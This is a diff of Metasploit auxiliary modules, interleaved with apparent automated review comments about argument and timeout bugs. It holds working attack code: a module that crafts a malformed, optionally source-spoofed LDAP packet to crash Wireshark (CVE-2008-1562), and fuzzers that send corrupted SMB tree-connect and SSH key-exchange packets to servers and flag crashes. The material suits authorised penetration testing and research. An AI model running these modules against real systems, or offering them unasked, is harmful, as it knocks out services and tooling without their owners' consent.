# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Capture
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Wireshark LDAP dissector DOS',
|
||||
@ -31,13 +31,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
[ 'CVE', '2008-1562' ],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 28 2008')
|
||||
|
||||
'DisclosureDate' => 'Mar 28 2008')
|
||||
|
||||
register_options([
|
||||
OptInt.new('RPORT', [true, 'The destination port', 389]),
|
||||
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
|
||||
], self.class)
|
||||
|
||||
|
||||
deregister_options('FILTER','PCAPFILE')
|
||||
end
|
||||
|
||||
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Sending malformed LDAP packet to #{rhost}")
|
||||
|
||||
m = Rex::Text.rand_text_alpha_lower(3)
|
||||
|
||||
|
||||
open_pcap
|
||||
|
||||
n = Racket::Racket.new
|
||||
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.protocol = 6
|
||||
n.l3.id = rand(0x10000)
|
||||
n.l3.ttl = 64
|
||||
|
||||
|
||||
n.l4 = Racket::L4::TCP.new
|
||||
n.l4.src_port = rand(65535)+1
|
||||
n.l4.seq = rand(0x100000000)
|
||||
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l4.window = 3072
|
||||
n.l4.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
pkt = n.pack
|
||||
|
||||
capture_sendto(pkt, rhost)
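Review bot: `def initialize` in this section takes no `info` argument and calls `super(` with a literal hash, unlike every other module touched in this commit, which uses `def initialize(info = {})` and `super(update_info(info, ...))`; any caller that passes module info in, as the sibling modules expect, would hit an ArgumentError here. Changing the two lines to `def initialize(info = {})` and `super(update_info(info,` preserves the module's behaviour and restores the convention. The tail of `run` after `capture_sendto(pkt, rhost)` continues past the last hunk.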
|
||||
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Fuzzer
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SMB Tree Connect Request Fuzzer',
|
||||
@ -29,35 +29,35 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
def do_smb_connect(pkt,opts={})
|
||||
@connected = false
|
||||
connect
|
||||
simple.login(
|
||||
datastore['SMBName'],
|
||||
datastore['SMBName'],
|
||||
datastore['SMBUser'],
|
||||
datastore['SMBPass'],
|
||||
datastore['SMBDomain']
|
||||
)
|
||||
|
||||
)
|
||||
|
||||
@connected = true
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{pkt}")
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
last_str = nil
|
||||
last_inp = nil
|
||||
last_err = nil
|
||||
|
||||
|
||||
cnt = 0
|
||||
|
||||
fuzz_strings do |str|
|
||||
cnt += 1
|
||||
|
||||
|
||||
if(cnt % 100 == 0)
|
||||
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
do_smb_connect(str, 0.25)
|
||||
rescue ::Interrupt
|
||||
@ -68,16 +68,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
if(not @connected)
|
||||
if(last_str)
|
||||
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
|
||||
else
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
last_str = str
|
||||
last_inp = @last_fuzzer_input
|
||||
end
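Review bot: `do_smb_connect(str, 0.25)` passes a bare Float where `do_smb_connect(pkt,opts={})` expects an options hash, and the helper never reads `opts` at all, so the 0.25 is dead and no timeout ever reaches `simple.connect`; a tree-connect that hangs stalls the whole fuzz loop. Either drop the argument or pass `:timeout => 0.25` and honour it inside the helper. The `rescue` arms of `run` between `rescue ::Interrupt` and `ensure` are outside the visible hunks.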
|
||||
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Fuzzer
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SMB Tree Connect Request Corruption',
|
||||
@ -32,48 +32,48 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('SMBTREE', [true, 'Specify the tree name to corrupt', "\\\\SERVER\\IPC$"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def do_smb_tree(pkt,opts={})
|
||||
@connected = false
|
||||
connect
|
||||
simple.login(
|
||||
datastore['SMBName'],
|
||||
datastore['SMBName'],
|
||||
datastore['SMBUser'],
|
||||
datastore['SMBPass'],
|
||||
datastore['SMBDomain']
|
||||
)
|
||||
|
||||
|
||||
@connected = true
|
||||
sock.put(pkt)
|
||||
sock.get_once(-1, opts[:timeout])
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
|
||||
# Connect in order to get the server-assigned user-id
|
||||
connect
|
||||
smb_login
|
||||
pkt = make_smb_tree
|
||||
disconnect
|
||||
|
||||
|
||||
last_str = nil
|
||||
last_inp = nil
|
||||
last_err = nil
|
||||
|
||||
|
||||
cnt = 0
|
||||
|
||||
|
||||
max = datastore['MAXDEPTH'].to_i
|
||||
max = nil if max == 0
|
||||
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
|
||||
|
||||
|
||||
print_status("Fuzzing SMB tree connect with #{tot} requests")
|
||||
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
|
||||
cnt += 1
|
||||
|
||||
|
||||
if(cnt % 100 == 0)
|
||||
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
r = do_smb_tree(str, 0.25)
|
||||
rescue ::Interrupt
|
||||
@ -84,29 +84,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
if(not @connected)
|
||||
if(last_str)
|
||||
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
|
||||
else
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
last_str = str
|
||||
last_inp = @last_fuzzer_input
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def make_smb_tree
|
||||
share = datastore['SMBTREE']
|
||||
pass = ''
|
||||
data = [ pass, share, '?????' ].collect{ |a| a + "\x00" }.join('');
|
||||
|
||||
|
||||
pkt = Rex::Proto::SMB::Constants::SMB_TREE_CONN_PKT.make_struct
|
||||
simple.client.smb_defaults(pkt['Payload']['SMB'])
|
||||
|
||||
|
||||
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TREE_CONNECT_ANDX
|
||||
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
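Review bot: `r = do_smb_tree(str, 0.25)` hands a Float to the parameter declared `opts={}`, and `do_smb_tree` then evaluates `opts[:timeout]` in `sock.get_once(-1, opts[:timeout])`; Float has no `[]` method, so every iteration raises NoMethodError right after `sock.put(pkt)` and the server's response is never read. The rescue arm between `rescue ::Interrupt` and `ensure` is outside the visible hunks, but presumably swallows it into `last_err`, which would then only ever record this mistake rather than a real crash indicator. The call should read `r = do_smb_tree(str, :timeout => 0.25)`, matching the keyword form the SSH fuzzer in this same commit uses. `make_smb_tree` continues past the last hunk.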
|
||||
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Fuzzer
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SSH Key Exchange Init Corruption',
|
||||
@ -32,40 +32,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def do_ssh_kexinit(pkt,opts={})
|
||||
@connected = false
|
||||
connect
|
||||
@connected = true
|
||||
|
||||
|
||||
@banner = sock.get_once(-1,opts[:banner_timeout])
|
||||
return if not @banner
|
||||
|
||||
|
||||
sock.put("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")
|
||||
sock.put(pkt)
|
||||
sock.get_once(-1,opts[:kex_timeout])
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
last_str = nil
|
||||
last_inp = nil
|
||||
last_err = nil
|
||||
|
||||
|
||||
pkt = make_kex_init
|
||||
cnt = 0
|
||||
|
||||
|
||||
max = datastore['MAXDEPTH'].to_i
|
||||
max = nil if max == 0
|
||||
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
|
||||
|
||||
|
||||
print_status("Fuzzing SSH initial key exchange with #{tot} requests")
|
||||
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
|
||||
cnt += 1
|
||||
|
||||
|
||||
if(cnt % 100 == 0)
|
||||
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
r = do_ssh_kexinit(str,:banner_timeout => 5, :kex_timeout => 0.5)
|
||||
rescue ::Interrupt
|
||||
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
if(not @connected)
|
||||
if(last_str)
|
||||
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
|
||||
else
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
print_status("Could not connect to the service: #{last_err}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
if(not @banner)
|
||||
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
|
||||
return
|
||||
@ -95,106 +95,106 @@ class Metasploit3 < Msf::Auxiliary
|
||||
last_inp = @last_fuzzer_input
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def make_kex_init
|
||||
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
|
||||
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
|
||||
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
|
||||
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
|
||||
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
|
||||
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
|
||||
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
|
||||
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
|
||||
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
|
||||
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
|
||||
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
|
||||
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
|
||||
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
|
||||
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
|
||||
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
|
||||
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
|
||||
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
|
||||
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
|
||||
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
|
||||
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
|
||||
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
|
||||
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
|
||||
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
|
||||
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
|
||||
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
|
||||
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
|
||||
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
|
||||
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
|
||||
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
|
||||
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
|
||||
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
|
||||
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
|
||||
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
|
||||
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
|
||||
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
|
||||
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
|
||||
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
|
||||
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
|
||||
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
|
||||
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
|
||||
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
|
||||
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
|
||||
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
|
||||
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
|
||||
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
|
||||
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
|
||||
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
|
||||
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
|
||||
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
|
||||
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
|
||||
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
|
||||
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
|
||||
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
|
||||
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
|
||||
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
|
||||
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
|
||||
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
|
||||
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
|
||||
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
|
||||
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
|
||||
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
|
||||
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
|
||||
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
|
||||
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
|
||||
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
|
||||
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
|
||||
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
|
||||
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
|
||||
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
|
||||
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
|
||||
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
|
||||
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
|
||||
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
|
||||
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
|
||||
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
|
||||
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
|
||||
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
|
||||
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
|
||||
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
|
||||
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
|
||||
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
|
||||
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
|
||||
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
|
||||
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
|
||||
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
|
||||
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
|
||||
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
|
||||
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
|
||||
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
|
||||
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
|
||||
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
|
||||
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
|
||||
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
|
||||
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
|
||||
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
|
||||
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
|
||||
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
|
||||
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
|
||||
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
|
||||
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
|
||||
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
|
||||
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
|
||||
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
|
||||
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
|
||||
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
|
||||
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
|
||||
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
|
||||
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
|
||||
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
|
||||
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
|
||||
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
|
||||
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
|
||||
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
|
||||
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
|
||||
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
|
||||
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
|
||||
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
|
||||
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
|
||||
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
|
||||
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
|
||||
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
|
||||
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
|
||||
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
|
||||
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
|
||||
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
|
||||
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
|
||||
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
|
||||
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
|
||||
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
